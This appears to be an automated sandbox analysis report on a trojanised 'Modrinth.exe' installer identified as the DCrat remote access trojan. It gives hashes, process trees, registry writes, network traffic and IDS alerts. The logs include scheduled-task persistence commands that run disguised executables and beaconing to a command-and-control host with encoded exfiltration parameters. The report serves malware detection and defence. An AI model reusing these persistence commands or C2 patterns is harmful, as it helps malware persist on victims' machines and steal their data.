| File name: | Modrinth.exe |
| Full analysis: | https://app.any.run/tasks/f28423f8-dc86-45ec-9403-a3695ecc0203 |
| Verdict: | Malicious activity |
| Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
| Analysis date: | July 04, 2024, 08:34:51 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | 21CAD48EDBC93DA2D1E1AB6F6632461A |
| SHA1: | 667A584EAE5A57937D66D64249C26C8B1B2ABF8F |
| SHA256: | 32619382AB72416DFF258BFF30A8B505D6E69E818345612892A121C28F3B23B0 |
| SSDEEP: | 98304:YHo7Mlmj9diwwwwwwwwwwwwwuYd0U4Hi4wVOWFrKdrHo7Mlmj9diwwwwwwwwwwwl:xaHVdHT4w5ZQ |
| .exe | | | Win32 Executable Delphi generic (37.4) |
|---|---|---|
| .scr | | | Windows screen saver (34.5) |
| .exe | | | Win32 Executable (generic) (11.9) |
| .exe | | | Win16/32 Executable Delphi generic (5.4) |
| .exe | | | Generic Win/DOS Executable (5.2) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 1992:06:19 22:22:17+00:00 |
| ImageFileCharacteristics: | Executable, No line numbers, No symbols, Bytes reversed lo, 32-bit, Bytes reversed hi |
| PEType: | PE32 |
| LinkerVersion: | 2.25 |
| CodeSize: | 5120 |
| InitializedDataSize: | 7135232 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x20cc |
| OSVersion: | 4 |
| ImageVersion: | - |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 776 | C:\WINDOWS\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:11 | C:\Windows\System32\SrTasks.exe | — | msiexec.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Windows System Protection background tasks. Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 936 | schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\admin\My Documents\msiexec.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 992 | schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\intosessionperfcrtSvc\sppsvc.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1120 | schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\intosessionperfcrtSvc\RuntimeBroker.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1228 | "C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=false" /installsource otherinstallcmd /sessionid "{A8AF7C2D-8FFC-4823-9F62-8AFC9ED73647}" /silent | C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe | — | MicrosoftEdgeUpdate.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Update Version: 1.3.187.41 Modules
| |||||||||||||||
| 1300 | schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\intosessionperfcrtSvc\RuntimeBroker.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1348 | C:\WINDOWS\system32\WerFault.exe -u -p 6628 -s 792 | C:\Windows\System32\WerFault.exe | Modrinth App.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Problem Reporting Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1912 | schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\msiexec.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2052 | "C:\intosessionperfcrtSvc\Componentwebfont.exe" | C:\intosessionperfcrtSvc\Componentwebfont.exe | — | cmd.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 2292 | schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\intosessionperfcrtSvc\RuntimeBroker.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Task Scheduler Configuration Tool Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
| Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.msi\OpenWithProgids |
| Operation: | write | Name: | Msi.Package |
Value: | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E |
| Operation: | write | Name: | @C:\WINDOWS\System32\msimsg.dll,-36 |
Value: &Install | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E |
| Operation: | write | Name: | @C:\WINDOWS\System32\msimsg.dll,-37 |
Value: Re&pair | |||
| (PID) Process: | (6264) Modrinth.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E |
| Operation: | write | Name: | @C:\WINDOWS\System32\msimsg.dll,-38 |
Value: &Uninstall | |||
| (PID) Process: | (6672) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore |
| Operation: | write | Name: | SrCreateRp (Enter) |
Value: 48000000000000001C98B613EDCDDA01101A000098090000D50700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6264 | Modrinth.exe | C:\Users\admin\AppData\Local\Temp\Modrinth App_0.7.1_x64_en-US.msi | — | |
MD5:— | SHA256:— | |||
| 6672 | msiexec.exe | C:\System Volume Information\SPP\metadata-2 | — | |
MD5:— | SHA256:— | |||
| 6672 | msiexec.exe | C:\WINDOWS\Installer\1d3cbd.msi | — | |
MD5:— | SHA256:— | |||
| 6264 | Modrinth.exe | C:\Users\admin\AppData\Local\Temp\Modrinth.exe | executable | |
MD5:24F86EDBA8782175BB4583A8CA79EA5A | SHA256:17B6CEE122E0E8AEC959B45F83646D5F7E4E2657677ECBB17FFBAAD33D3D5C0B | |||
| 6356 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB | der | |
MD5:146FA937381EEA83C5B5485BD3991122 | SHA256:B31E6AA41DCA44EDDB9427C498415A79C92FD8053CCB3351F9A816C1018F001E | |||
| 6356 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 | der | |
MD5:6EC5BB94B103A2C5CF7AD1B4091154B0 | SHA256:3A3C925356A9BBAA9D6342F34115AFAC758910D153FD21DCBBEBFE05764C151F | |||
| 6356 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_7907B0D1F2DC082B9BA6064FC995BD36 | der | |
MD5:D7E0610B2CFD6FF6F2AA1B9D3D057055 | SHA256:BC02079F96C1A0E3098F90CADE6557B857A63B5773F316183ACE30DC550969C3 | |||
| 6356 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 | binary | |
MD5:132AF5E056280CE9FC442A7196FBD00C | SHA256:803011D62DF993D0559CE00BB5F3A5B81CDB1E5EBB3F8628F56C39BDFBF7FAB1 | |||
| 6356 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB | binary | |
MD5:D9A3600260F76EB17AF9A9EFFF948684 | SHA256:2C72C3FC33A4AB94A094BFC5EE49EBA8BCB16F50573ACDC5FF6B7EBFA066A7EB | |||
| 6672 | msiexec.exe | C:\WINDOWS\Installer\1d3cbf.msi | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | — | — | unknown |
6612 | sppsvc.exe | GET | 200 | 92.53.96.121:80 | http://cz36357.tw1.ru/8ab73f07.php?fCDuRi7k47jZMpBXXOZw=TfsOlUUD0WPmuDeaX4DM6e5G6YTEZ2Q&qoLgVgpOmgDkU=bmh69UVjCyjlRMBQn8G06F17E&6a5021bbd434ee5b38d9b9caf09979e1=gZyAjN3QzNjJTO2AjM2Q2YilTYxkjY0kTNyETNwMDNjBTYiJjN5YTZ1AjM0ETOwITOxQTOygTN&d58f508b768cf6bab6e0c14a391a376d=QY5cDZwYGOhJTOjNTN5EzMkJTMkVWO5MTOwUDN5kTMxYzNlBzYhFWM&5d89febb4a574dd6758c45eda2381ba6=d1nI4UWMzQTMwU2M3UGMhljNmZzYjhzMzQTOxkDZ3QTZ5IDOkV2NjlzYjJiOicjYkZDZ2czYjJjYwEWO0QTM4MTZ5UjN0gDO3Q2YiJTZiwiI0QjMkJjZiZjYlJWNzI2YhFTY2M2YwQmYmZTYyUWYmFjMkVmYhRDOkJiOiEmN3QjNxUGZ5ETZwMmN3cDZllzMkVTNmRDO3gjZiJDOis3W&6995680125e2a761956b154722966dca=0VfiIiOiYzNjVWNidjM1UWZyMjMmhDNmVDN0AzMzQGMwUTZ4gDOiwiI4UWMzQTMwU2M3UGMhljNmZzYjhzMzQTOxkDZ3QTZ5IDOkV2NjlzYjJiOicjYkZDZ2czYjJjYwEWO0QTM4MTZ5UjN0gDO3Q2YiJTZiwiI0QjMkJjZiZjYlJWNzI2YhFTY2M2YwQmYmZTYyUWYmFjMkVmYhRDOkJiOiEmN3QjNxUGZ5ETZwMmN3cDZllzMkVTNmRDO3gjZiJDOisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWVHVGb1MkYzZ1RhpnSYp1M5c0YjhnRNVXRqR2Y4ZkYzZ1RhRlSYp1M5cUV6R2MitWNXFGW4ZEW51EVixmUzMWNOZEWj5UMWBlUrRlSkZEWjBneRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljSTlFMGJTYzljMTZXRXFmeGtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMlWRXF2a1c1UnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaVRVT4tmaMd3ZExkMVpnT0QTaOlXSp9UaNJjYzp0QMlGNVNVavpWS1oESkVnVzImaKNETpdmMjxmUXlVeCZUS5Z0RkBjVslkNJlmY2xmMaxmSul0cJlHZ2VjMhpmVIRVavpWS1IFWhpmSDxUaJpGT6FkaNVXVU1UdjRkTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYzNjVWNidjM1UWZyMjMmhDNmVDN0AzMzQGMwUTZ4gDOiwiI5IWOhJzYkNGZ2M2NwgjY0EGOwcjYldjZlNmY4UzM4UDN3ImY3YDOlJiOicjYkZDZ2czYjJjYwEWO0QTM4MTZ5UjN0gDO3Q2YiJTZiwiI0QjMkJjZiZjYlJWNzI2YhFTY2M2YwQmYmZTYyUWYmFjMkVmYhRDOkJiOiEmN3QjNxUGZ5ETZwMmN3cDZllzMkVTNmRDO3gjZiJDOis3W | unknown | — | — | unknown |
— | — | GET | 301 | 23.35.229.160:443 | https://go.microsoft.com/fwlink/p/?LinkId=2124703 | unknown | — | — | — |
6612 | sppsvc.exe | GET | 200 | 92.53.96.121:80 | http://cz36357.tw1.ru/8ab73f07.php?fCDuRi7k47jZMpBXXOZw=TfsOlUUD0WPmuDeaX4DM6e5G6YTEZ2Q&qoLgVgpOmgDkU=bmh69UVjCyjlRMBQn8G06F17E&6a5021bbd434ee5b38d9b9caf09979e1=gZyAjN3QzNjJTO2AjM2Q2YilTYxkjY0kTNyETNwMDNjBTYiJjN5YTZ1AjM0ETOwITOxQTOygTN&d58f508b768cf6bab6e0c14a391a376d=QY5cDZwYGOhJTOjNTN5EzMkJTMkVWO5MTOwUDN5kTMxYzNlBzYhFWM&5d89febb4a574dd6758c45eda2381ba6=d1nI4UWMzQTMwU2M3UGMhljNmZzYjhzMzQTOxkDZ3QTZ5IDOkV2NjlzYjJiOicjYkZDZ2czYjJjYwEWO0QTM4MTZ5UjN0gDO3Q2YiJTZiwiI0QjMkJjZiZjYlJWNzI2YhFTY2M2YwQmYmZTYyUWYmFjMkVmYhRDOkJiOiEmN3QjNxUGZ5ETZwMmN3cDZllzMkVTNmRDO3gjZiJDOis3W&6995680125e2a761956b154722966dca=0VfiIiOiYzNjVWNidjM1UWZyMjMmhDNmVDN0AzMzQGMwUTZ4gDOiwiI4UWMzQTMwU2M3UGMhljNmZzYjhzMzQTOxkDZ3QTZ5IDOkV2NjlzYjJiOicjYkZDZ2czYjJjYwEWO0QTM4MTZ5UjN0gDO3Q2YiJTZiwiI0QjMkJjZiZjYlJWNzI2YhFTY2M2YwQmYmZTYyUWYmFjMkVmYhRDOkJiOiEmN3QjNxUGZ5ETZwMmN3cDZllzMkVTNmRDO3gjZiJDOisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWVHVGb1MkYzZ1RhpnSYp1M5c0YjhnRNVXRqR2Y4ZkYzZ1RhRlSYp1M5cUV6R2MitWNXFGW4ZEW51EVixmUzMWNOZEWj5UMWBlUrRlSkZEWjBneRl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVIp0QMlGNrlkNJlmYwFzRaJkTYFWa3lWSp9maJhkRFZVa3lWSwwWbRdWUq50ZVJzYwpESjlnVHRWdWVUS3VERJpHZzI2a1cVYYpUaPlWSYp1V1cVYYp0QMljSTlFMGJTYzljMTZXRXFmeGtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMlWRXF2a1c1UnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaVRVT4tmaMd3ZExkMVpnT0QTaOlXSp9UaNJjYzp0QMlGNVNVavpWS1oESkVnVzImaKNETpdmMjxmUXlVeCZUS5Z0RkBjVslkNJlmY2xmMaxmSul0cJlHZ2VjMhpmVIRVavpWS1IFWhpmSDxUaJpGT6FkaNVXVU1UdjRkTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYzNjVWNidjM1UWZyMjMmhDNmVDN0AzMzQGMwUTZ4gDOiwiI5IWOhJzYkNGZ2M2NwgjY0EGOwcjYldjZlNmY4UzM4UDN3ImY3YDOlJiOicjYkZDZ2czYjJjYwEWO0QTM4MTZ5UjN0gDO3Q2YiJTZiwiI0QjMkJjZiZjYlJWNzI2YhFTY2M2YwQmYmZTYyUWYmFjMkVmYhRDOkJiOiEmN3QjNxUGZ5ETZwMmN3cDZllzMkVTNmRDO3gjZiJDOis3W | unknown | — | — | unknown |
— | — | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
— | — | GET | 200 | 23.48.23.143:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D | unknown | — | — | unknown |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAI%2BPkFRW%2FWacj%2Bo0kal%2FzM%3D | unknown | — | — | unknown |
— | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
— | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4032 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
— | — | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
— | — | 23.48.23.143:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown |
— | — | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1972 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1280 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6004 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6612 | sppsvc.exe | 92.53.96.121:80 | cz36357.tw1.ru | TimeWeb Ltd. | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
ocsp.digicert.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
cz36357.tw1.ru |
| unknown |
go.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
msedge.sf.dl.delivery.mp.microsoft.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
msedge.api.cdp.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
6612 | sppsvc.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
6612 | sppsvc.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
— | — | Misc activity | ET INFO Request for EXE via Powershell |
— | — | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
6164 | svchost.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
Process | Message |
|---|---|
Modrinth App.exe | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|
Modrinth App.exe | WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
|